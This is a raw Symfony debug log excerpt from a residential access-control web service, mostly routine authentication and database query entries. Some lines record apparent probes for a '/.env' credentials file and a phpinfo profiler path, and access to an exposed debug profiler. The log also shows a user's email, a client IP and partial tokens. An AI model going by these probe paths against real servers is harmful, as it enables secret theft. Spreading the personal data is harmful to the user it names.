  9317. [2025-12-21 00:51:15] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9318. [2025-12-21 00:51:15] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9319. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9320. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9321. [2025-12-21 00:51:15] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9322. [2025-12-21 00:51:15] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9323. [2025-12-21 00:51:15] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9324. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9325. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9326. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9327. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9328. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  9329. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  9330. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9331. [2025-12-21 00:51:15] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9332. [2025-12-21 00:52:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9333. [2025-12-21 00:53:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1702ec","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/1702ec?panel=time","method":"GET"} []
  9334. [2025-12-21 00:53:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  9335. [2025-12-21 00:53:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9336. [2025-12-21 00:53:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  9337. [2025-12-21 00:53:52] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9338. [2025-12-21 00:53:52] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9339. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9340. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9341. [2025-12-21 00:53:52] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9342. [2025-12-21 00:53:52] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9343. [2025-12-21 00:53:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9344. [2025-12-21 00:53:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9345. [2025-12-21 00:53:52] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9346. [2025-12-21 00:53:52] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9347. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9348. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9349. [2025-12-21 00:53:52] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9350. [2025-12-21 00:53:52] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9351. [2025-12-21 00:53:52] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9352. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9353. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9354. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9355. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9356. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9357. [2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9358. [2025-12-21 00:53:52] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9359. [2025-12-21 00:56:12] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9360. [2025-12-21 00:56:12] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9361. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9362. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9363. [2025-12-21 00:56:12] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9364. [2025-12-21 00:56:12] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9365. [2025-12-21 00:56:12] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9366. [2025-12-21 00:56:12] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9367. [2025-12-21 00:56:12] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9368. [2025-12-21 00:56:12] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9369. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9370. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9371. [2025-12-21 00:56:12] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9372. [2025-12-21 00:56:12] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9373. [2025-12-21 00:56:12] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9374. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9375. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9376. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9377. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9378. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9379. [2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9380. [2025-12-21 00:56:12] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9381. [2025-12-21 00:56:15] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9382. [2025-12-21 00:56:15] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9383. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9384. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9385. [2025-12-21 00:56:15] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9386. [2025-12-21 00:56:15] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9387. [2025-12-21 00:56:15] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9388. [2025-12-21 00:56:15] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9389. [2025-12-21 00:56:15] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9390. [2025-12-21 00:56:15] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9391. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9392. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9393. [2025-12-21 00:56:15] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9394. [2025-12-21 00:56:15] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9395. [2025-12-21 00:56:15] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9396. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9397. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9398. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9399. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9400. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9401. [2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9402. [2025-12-21 00:56:15] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9403. [2025-12-21 00:56:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"956458","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/956458?panel=router","method":"GET"} []
  9404. [2025-12-21 00:56:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  9405. [2025-12-21 00:57:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f76107","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f76107?panel=events","method":"GET"} []
  9406. [2025-12-21 00:57:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9407. [2025-12-21 01:00:58] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"015ef8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/015ef8/search/results?ip=189.172.56.183&limit=10&method=GET","method":"GET"} []
